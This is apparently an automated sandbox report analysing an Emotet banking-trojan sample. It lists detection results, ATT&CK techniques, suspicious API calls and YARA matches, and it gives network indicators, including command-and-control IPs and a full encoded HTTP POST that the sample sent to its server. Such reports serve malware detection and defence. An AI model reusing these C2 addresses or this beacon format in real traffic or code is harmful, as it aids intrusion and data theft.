Loading ...

Play interactive tourEdit tour

Analysis Report m5wpHJDhIl

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:211727
Start date:28.02.2020
Start time:09:40:45
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 13m 22s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:m5wpHJDhIl (renamed file extension from none to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:9
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.troj.evad.winEXE@7/0@0/11
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 85.8% (good quality ratio 83%)
  • Quality average: 78.8%
  • Quality standard deviation: 27.8%
HCA Information:
  • Successful, ratio: 82%
  • Number of executed functions: 103
  • Number of non-executed functions: 347
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
Show All
  • Exclude process from analysis (whitelisted): MusNotifyIcon.exe, conhost.exe, CompatTelRunner.exe
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Emotet
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1Execution through API121Hidden Files and Directories1Valid Accounts1Deobfuscate/Decode Files or Information1Input Capture1System Time Discovery2Remote File Copy1Input Capture1Data Encrypted11Uncommonly Used Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
Replication Through Removable MediaCommand-Line Interface2Valid Accounts1Access Token Manipulation1File Deletion1Network SniffingSecurity Software Discovery2Remote ServicesData from Removable MediaExfiltration Over Other Network MediumRemote File Copy1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesService Execution12Modify Existing Service11Process Injection1Obfuscated Files or Information2Input CaptureSystem Service Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Cryptographic Protocol22Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskNew Service2New Service2Masquerading12Credentials in FilesFile and Directory Discovery2Logon ScriptsInput CaptureData EncryptedStandard Non-Application Layer Protocol1SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessHidden Files and Directories1Account ManipulationSystem Information Discovery36Shared WebrootData StagedScheduled TransferStandard Application Layer Protocol12Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceValid Accounts1Brute ForceProcess Discovery2Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskAccess Token Manipulation1Two-Factor Authentication InterceptionApplication Window Discovery1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionProcess Injection1Bash HistoryNetwork Service ScanningRemote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for sampleShow sources
Source: m5wpHJDhIl.exeAvira: detection malicious, Label: TR/AD.Emotet.vzbjd
Found malware configurationShow sources
Source: wrapgroup.exe.2192.6.memstrMalware Configuration Extractor: Emotet {"C2 list": ["120.150.246.241/K9czcmT3hzV"]}
Multi AV Scanner detection for submitted fileShow sources
Source: m5wpHJDhIl.exeVirustotal: Detection: 81%Perma Link
Source: m5wpHJDhIl.exeReversingLabs: Detection: 80%

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_00402B10 CryptStringToBinaryA,_malloc,0_2_00402B10
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_00402B10 CryptStringToBinaryA,_malloc,1_2_00402B10
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0211207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,1_2_0211207B
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0211215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,1_2_0211215A
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_02111F11 CryptExportKey,1_2_02111F11
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_02111F56 CryptGetHashParam,1_2_02111F56
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_02111F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,1_2_02111F75
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_02111FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,1_2_02111FFC
Source: C:\Windows\SysWOW64\wrapgroup.exeCode function: 6_2_00F2207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,6_2_00F2207B
Source: C:\Windows\SysWOW64\wrapgroup.exeCode function: 6_2_00F21FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,6_2_00F21FFC
Source: C:\Windows\SysWOW64\wrapgroup.exeCode function: 6_2_00F21F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,6_2_00F21F75
Source: C:\Windows\SysWOW64\wrapgroup.exeCode function: 6_2_00F2215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,6_2_00F2215A
Source: C:\Windows\SysWOW64\wrapgroup.exeCode function: 6_2_00F21F11 CryptExportKey,6_2_00F21F11
Source: C:\Windows\SysWOW64\wrapgroup.exeCode function: 6_2_00F21F56 CryptGetHashParam,6_2_00F21F56

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_004190B9 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,0_2_004190B9
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_00402560 FindFirstFileA,SendMessageA,GetFullPathNameA,FindNextFileA,FindNextFileA,FindNextFileA,FindClose,0_2_00402560
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_00419C0B lstrlenA,FindFirstFileA,FindClose,0_2_00419C0B
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_004190B9 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,1_2_004190B9
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_00402560 FindFirstFileA,SendMessageA,GetFullPathNameA,FindNextFileA,FindNextFileA,FindNextFileA,FindClose,1_2_00402560
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_00419C0B lstrlenA,FindFirstFileA,FindClose,1_2_00419C0B

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.5:49782 -> 165.227.156.155:443
Source: TrafficSnort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.5:49788 -> 67.225.179.64:8080
Source: TrafficSnort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.2.5:49790 -> 176.31.200.130:8080
Source: TrafficSnort IDS: 2404304 ET CNC Feodo Tracker Reported CnC Server TCP group 3 192.168.2.5:49795 -> 120.150.246.241:80
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.2.5:49779 -> 66.209.97.122:8080
Source: global trafficTCP traffic: 192.168.2.5:49780 -> 174.77.190.137:8080
Source: global trafficTCP traffic: 192.168.2.5:49786 -> 167.99.105.223:7080
Source: global trafficTCP traffic: 192.168.2.5:49788 -> 67.225.179.64:8080
Source: global trafficTCP traffic: 192.168.2.5:49790 -> 176.31.200.130:8080
Source: global trafficTCP traffic: 192.168.2.5:49792 -> 5.196.74.210:8080
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: POST /K9czcmT3hzV HTTP/1.1Referer: http://120.150.246.241/K9czcmT3hzVContent-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 120.150.246.241Content-Length: 586Connection: Keep-AliveCache-Control: no-cacheData Raw: 4b 39 63 7a 63 6d 54 33 68 7a 56 3d 47 39 53 4c 76 31 53 5a 6c 25 32 42 69 46 44 48 78 73 50 66 62 44 4c 39 38 48 6b 71 62 31 59 38 4b 6b 53 36 34 58 6f 79 48 44 77 4a 59 6d 35 56 61 48 33 62 48 44 31 61 71 4f 4a 35 67 44 63 50 51 49 39 58 65 39 79 72 32 39 68 25 32 46 76 49 5a 73 55 77 54 79 25 32 46 4a 6f 4b 61 4b 43 53 4d 56 4a 58 25 32 42 6b 35 34 25 32 46 6b 67 33 51 72 4d 47 53 63 70 4a 62 75 69 55 4e 64 4e 75 55 6b 38 44 6b 57 32 36 62 62 55 6d 31 65 6f 79 52 69 42 72 36 64 7a 38 50 65 79 48 65 31 63 78 74 74 6c 63 43 69 52 50 59 35 78 47 45 35 50 6b 49 4c 79 36 25 32 46 7a 46 36 25 32 46 4a 4c 72 73 75 39 51 45 74 75 73 73 55 37 70 69 54 32 52 4e 62 7a 57 58 49 54 70 76 53 59 6e 4c 71 65 4c 73 79 55 53 30 4e 63 6c 54 72 42 52 45 4f 76 33 47 6c 6b 65 34 6c 4c 62 36 67 6d 74 37 7a 5a 72 58 56 4b 47 57 79 36 77 43 46 48 77 5a 34 70 48 7a 38 39 45 69 66 75 55 33 4d 47 58 56 39 59 69 4c 42 47 64 4b 39 37 31 61 25 32 46 57 42 6a 63 74 42 51 32 73 76 49 78 51 70 6e 66 37 78 37 25 32 46 6d 64 32 35 6c 30 37 46 42 79 78 4e 4f 64 6c 4d 4b 53 72 6e 33 4e 55 65 65 65 34 30 72 6f 4c 57 34 4c 79 50 7a 61 58 73 66 63 69 41 52 6b 34 69 25 32 42 31 6c 56 78 32 36 63 73 47 77 49 48 48 43 68 67 45 25 32 42 70 32 62 63 66 33 34 79 31 51 61 70 50 55 61 43 50 4d 42 38 34 62 63 73 25 32 46 4d 7a 4e 42 4e 6b 53 4f 6b 75 44 25 32 46 71 6e 53 47 37 6d 32 32 6b 4b 6f 59 32 70 39 54 38 4a 41 78 72 32 77 38 65 64 47 49 68 74 37 78 4b 50 6c 6d 6d 66 79 6a 58 68 62 4b 68 33 61 36 4f 47 74 25 32 42 77 41 49 69 51 37 4c 49 4e 77 4e 6e 39 72 6c 79 4a 77 35 63 52 71 43 42 47 44 4e 47 62 36 47 76 43 37 4c 77 4e 70 6c 38 70 4a 78 44 71 66 35 36 39 6a 77 6b 25 32 42 4b 4e 6a 39 39 6d 75 53 6b 37 66 4c 48 38 36 25 32 42 6c 6d 30 4c 72 4a 67 77 70 55 25 33 44 Data Ascii: K9czcmT3hzV=G9SLv1SZl%2BiFDHxsPfbDL98Hkqb1Y8KkS64XoyHDwJYm5VaH3bHD1aqOJ5gDcPQI9Xe9yr29h%2FvIZsUwTy%2FJoKaKCSMVJX%2Bk54%2Fkg3QrMGScpJbuiUNdNuUk8DkW26bbUm1eoyRiBr6dz8PeyHe1cxttlcCiRPY5xGE5PkILy6%2FzF6%2FJLrsu9QEtussU7piT2RNbzWXITpvSYnLqeLsyUS0NclTrBREOv3Glke4lLb6gmt7zZrXVKGWy6wCFHwZ4pHz89EifuU3MGXV9YiLBGdK971a%2FWBjctBQ2svIxQpnf7x7%2Fmd25l07FByxNOdlMKSrn3NUeee40roLW4LyPzaXsfciARk4i%2B1lVx26csGwIHHChgE%2Bp2bcf34y1QapPUaCPMB84bcs%2FMzNBNkSOkuD%2FqnSG7m22kKoY2p9T8JAxr2w8edGIht7xKPlmmfyjXhbKh3a6OGt%2BwAIiQ7LINwNn9rlyJw5cRqCBGDNGb6GvC7LwNpl8pJxDqf569jwk%2BKNj99muSk7fLH86%2Blm0LrJgwpU%3D
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 66.209.97.122
Source: unknownTCP traffic detected without corresponding DNS query: 66.209.97.122
Source: unknownTCP traffic detected without corresponding DNS query: 66.209.97.122
Source: unknownTCP traffic detected without corresponding DNS query: 174.77.190.137
Source: unknownTCP traffic detected without corresponding DNS query: 174.77.190.137
Source: unknownTCP traffic detected without corresponding DNS query: 174.77.190.137
Source: unknownTCP traffic detected without corresponding DNS query: 104.137.176.186
Source: unknownTCP traffic detected without corresponding DNS query: 104.137.176.186
Source: unknownTCP traffic detected without corresponding DNS query: 104.137.176.186
Source: unknownTCP traffic detected without corresponding DNS query: 165.227.156.155
Source: unknownTCP traffic detected without corresponding DNS query: 165.227.156.155
Source: unknownTCP traffic detected without corresponding DNS query: 165.227.156.155
Source: unknownTCP traffic detected without corresponding DNS query: 167.99.105.223
Source: unknownTCP traffic detected without corresponding DNS query: 167.99.105.223
Source: unknownTCP traffic detected without corresponding DNS query: 167.99.105.223
Source: unknownTCP traffic detected without corresponding DNS query: 67.225.179.64
Source: unknownTCP traffic detected without corresponding DNS query: 67.225.179.64
Source: unknownTCP traffic detected without corresponding DNS query: 67.225.179.64
Source: unknownTCP traffic detected without corresponding DNS query: 176.31.200.130
Source: unknownTCP traffic detected without corresponding DNS query: 176.31.200.130
Source: unknownTCP traffic detected without corresponding DNS query: 176.31.200.130
Source: unknownTCP traffic detected without corresponding DNS query: 5.196.74.210
Source: unknownTCP traffic detected without corresponding DNS query: 5.196.74.210
Source: unknownTCP traffic detected without corresponding DNS query: 5.196.74.210
Source: unknownTCP traffic detected without corresponding DNS query: 82.155.161.203
Source: unknownTCP traffic detected without corresponding DNS query: 82.155.161.203
Source: unknownTCP traffic detected without corresponding DNS query: 82.155.161.203
Source: unknownTCP traffic detected without corresponding DNS query: 101.187.247.29
Source: unknownTCP traffic detected without corresponding DNS query: 101.187.247.29
Source: unknownTCP traffic detected without corresponding DNS query: 101.187.247.29
Source: unknownTCP traffic detected without corresponding DNS query: 120.150.246.241
Source: unknownTCP traffic detected without corresponding DNS query: 120.150.246.241
Source: unknownTCP traffic detected without corresponding DNS query: 120.150.246.241
Source: unknownTCP traffic detected without corresponding DNS query: 120.150.246.241
Source: unknownTCP traffic detected without corresponding DNS query: 120.150.246.241
Source: unknownTCP traffic detected without corresponding DNS query: 120.150.246.241
Contains functionality to download additional files from the internetShow sources
Source: C:\Windows\SysWOW64\wrapgroup.exeCode function: 6_2_00F21383 InternetReadFile,6_2_00F21383
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /K9czcmT3hzV HTTP/1.1Referer: http://120.150.246.241/K9czcmT3hzVContent-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 120.150.246.241Content-Length: 586Connection: Keep-AliveCache-Control: no-cacheData Raw: 4b 39 63 7a 63 6d 54 33 68 7a 56 3d 47 39 53 4c 76 31 53 5a 6c 25 32 42 69 46 44 48 78 73 50 66 62 44 4c 39 38 48 6b 71 62 31 59 38 4b 6b 53 36 34 58 6f 79 48 44 77 4a 59 6d 35 56 61 48 33 62 48 44 31 61 71 4f 4a 35 67 44 63 50 51 49 39 58 65 39 79 72 32 39 68 25 32 46 76 49 5a 73 55 77 54 79 25 32 46 4a 6f 4b 61 4b 43 53 4d 56 4a 58 25 32 42 6b 35 34 25 32 46 6b 67 33 51 72 4d 47 53 63 70 4a 62 75 69 55 4e 64 4e 75 55 6b 38 44 6b 57 32 36 62 62 55 6d 31 65 6f 79 52 69 42 72 36 64 7a 38 50 65 79 48 65 31 63 78 74 74 6c 63 43 69 52 50 59 35 78 47 45 35 50 6b 49 4c 79 36 25 32 46 7a 46 36 25 32 46 4a 4c 72 73 75 39 51 45 74 75 73 73 55 37 70 69 54 32 52 4e 62 7a 57 58 49 54 70 76 53 59 6e 4c 71 65 4c 73 79 55 53 30 4e 63 6c 54 72 42 52 45 4f 76 33 47 6c 6b 65 34 6c 4c 62 36 67 6d 74 37 7a 5a 72 58 56 4b 47 57 79 36 77 43 46 48 77 5a 34 70 48 7a 38 39 45 69 66 75 55 33 4d 47 58 56 39 59 69 4c 42 47 64 4b 39 37 31 61 25 32 46 57 42 6a 63 74 42 51 32 73 76 49 78 51 70 6e 66 37 78 37 25 32 46 6d 64 32 35 6c 30 37 46 42 79 78 4e 4f 64 6c 4d 4b 53 72 6e 33 4e 55 65 65 65 34 30 72 6f 4c 57 34 4c 79 50 7a 61 58 73 66 63 69 41 52 6b 34 69 25 32 42 31 6c 56 78 32 36 63 73 47 77 49 48 48 43 68 67 45 25 32 42 70 32 62 63 66 33 34 79 31 51 61 70 50 55 61 43 50 4d 42 38 34 62 63 73 25 32 46 4d 7a 4e 42 4e 6b 53 4f 6b 75 44 25 32 46 71 6e 53 47 37 6d 32 32 6b 4b 6f 59 32 70 39 54 38 4a 41 78 72 32 77 38 65 64 47 49 68 74 37 78 4b 50 6c 6d 6d 66 79 6a 58 68 62 4b 68 33 61 36 4f 47 74 25 32 42 77 41 49 69 51 37 4c 49 4e 77 4e 6e 39 72 6c 79 4a 77 35 63 52 71 43 42 47 44 4e 47 62 36 47 76 43 37 4c 77 4e 70 6c 38 70 4a 78 44 71 66 35 36 39 6a 77 6b 25 32 42 4b 4e 6a 39 39 6d 75 53 6b 37 66 4c 48 38 36 25 32 42 6c 6d 30 4c 72 4a 67 77 70 55 25 33 44 Data Ascii: K9czcmT3hzV=G9SLv1SZl%2BiFDHxsPfbDL98Hkqb1Y8KkS64XoyHDwJYm5VaH3bHD1aqOJ5gDcPQI9Xe9yr29h%2FvIZsUwTy%2FJoKaKCSMVJX%2Bk54%2Fkg3QrMGScpJbuiUNdNuUk8DkW26bbUm1eoyRiBr6dz8PeyHe1cxttlcCiRPY5xGE5PkILy6%2FzF6%2FJLrsu9QEtussU7piT2RNbzWXITpvSYnLqeLsyUS0NclTrBREOv3Glke4lLb6gmt7zZrXVKGWy6wCFHwZ4pHz89EifuU3MGXV9YiLBGdK971a%2FWBjctBQ2svIxQpnf7x7%2Fmd25l07FByxNOdlMKSrn3NUeee40roLW4LyPzaXsfciARk4i%2B1lVx26csGwIHHChgE%2Bp2bcf34y1QapPUaCPMB84bcs%2FMzNBNkSOkuD%2FqnSG7m22kKoY2p9T8JAxr2w8edGIht7xKPlmmfyjXhbKh3a6OGt%2BwAIiQ7LINwNn9rlyJw5cRqCBGDNGb6GvC7LwNpl8pJxDqf569jwk%2BKNj99muSk7fLH86%2Blm0LrJgwpU%3D
Urls found in memory or binary dataShow sources
Source: wrapgroup.exe, 00000006.00000002.3815163328.0000000000199000.00000004.00000001.sdmpString found in binary or memory: http://120.150.246.241/K9czcmT3hzV
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Potential key logger detected (key state polling based)Show sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0040D763 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,0_2_0040D763
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_00407C71 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,0_2_00407C71
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0040D763 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,1_2_0040D763
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_00407C71 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,1_2_00407C71

E-Banking Fraud:

barindex
Detected Emotet e-Banking trojanShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0211DE9C1_2_0211DE9C
Source: C:\Windows\SysWOW64\wrapgroup.exeCode function: 6_2_00F2DE9C6_2_00F2DE9C
Yara detected EmotetShow sources
Source: Yara matchFile source: 00000000.00000002.2102840767.0000000002260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.2125425102.0000000000680000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.2125606910.0000000000F11000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.3815990072.0000000000F21000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.3815703856.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000001.00000002.2127467020.0000000000750000.00000040.00000001.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionality to import cryptographic keys (often used in ransomware)Show sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_02111F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,1_2_02111F75
Source: C:\Windows\SysWOW64\wrapgroup.exeCode function: 6_2_00F21F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,6_2_00F21F75

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000000.00000002.2102840767.0000000002260000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000005.00000002.2125425102.0000000000680000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000005.00000002.2125606910.0000000000F11000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000001.00000002.2127695275.0000000002111000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000006.00000002.3815990072.0000000000F21000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000006.00000002.3815703856.0000000000610000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000000.00000002.2102869064.0000000002281000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000001.00000002.2127467020.0000000000750000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Contains functionality to delete servicesShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0211E068 GetModuleFileNameW,lstrlenW,OpenServiceW,DeleteService,CloseServiceHandle,1_2_0211E068
Contains functionality to launch a process as a different userShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_02111D2B CreateProcessAsUserW,CreateProcessW,1_2_02111D2B
Creates files inside the system directoryShow sources
Source: C:\Windows\SysWOW64\wrapgroup.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
Deletes files inside the Windows folderShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeFile deleted: C:\Windows\SysWOW64\wrapgroup.exe:Zone.IdentifierJump to behavior
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_004251D40_2_004251D4
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0041E2770_2_0041E277
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0042C3AD0_2_0042C3AD
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_004094610_2_00409461
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0041D5200_2_0041D520
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0041E64B0_2_0041E64B
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0042E6DF0_2_0042E6DF
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_004296AF0_2_004296AF
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0042C8EF0_2_0042C8EF
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_004219510_2_00421951
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0041EA570_2_0041EA57
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0041DDA40_2_0041DDA4
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0042BE6B0_2_0042BE6B
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0041EE770_2_0041EE77
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_00426E7D0_2_00426E7D
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0042CFB30_2_0042CFB3
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_022630E40_2_022630E4
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_022630E80_2_022630E8
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_022628C10_2_022628C1
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_022837A90_2_022837A9
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_022837A50_2_022837A5
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_02282F820_2_02282F82
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_004251D41_2_004251D4
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0041E2771_2_0041E277
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0042C3AD1_2_0042C3AD
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_004094611_2_00409461
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0041D5201_2_0041D520
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0041E64B1_2_0041E64B
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0042E6DF1_2_0042E6DF
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_004296AF1_2_004296AF
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0042C8EF1_2_0042C8EF
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_004219511_2_00421951
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0041EA571_2_0041EA57
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0041DDA41_2_0041DDA4
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0042BE6B1_2_0042BE6B
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0041EE771_2_0041EE77
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_00426E7D1_2_00426E7D
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0042CFB31_2_0042CFB3
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_007530E41_2_007530E4
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_007530E81_2_007530E8
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_007528C11_2_007528C1
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_02112F821_2_02112F82
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_021137A51_2_021137A5
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_021137A91_2_021137A9
Source: C:\Windows\SysWOW64\wrapgroup.exeCode function: 5_2_00F137A55_2_00F137A5
Source: C:\Windows\SysWOW64\wrapgroup.exeCode function: 5_2_00F137A95_2_00F137A9
Source: C:\Windows\SysWOW64\wrapgroup.exeCode function: 5_2_00F12F825_2_00F12F82
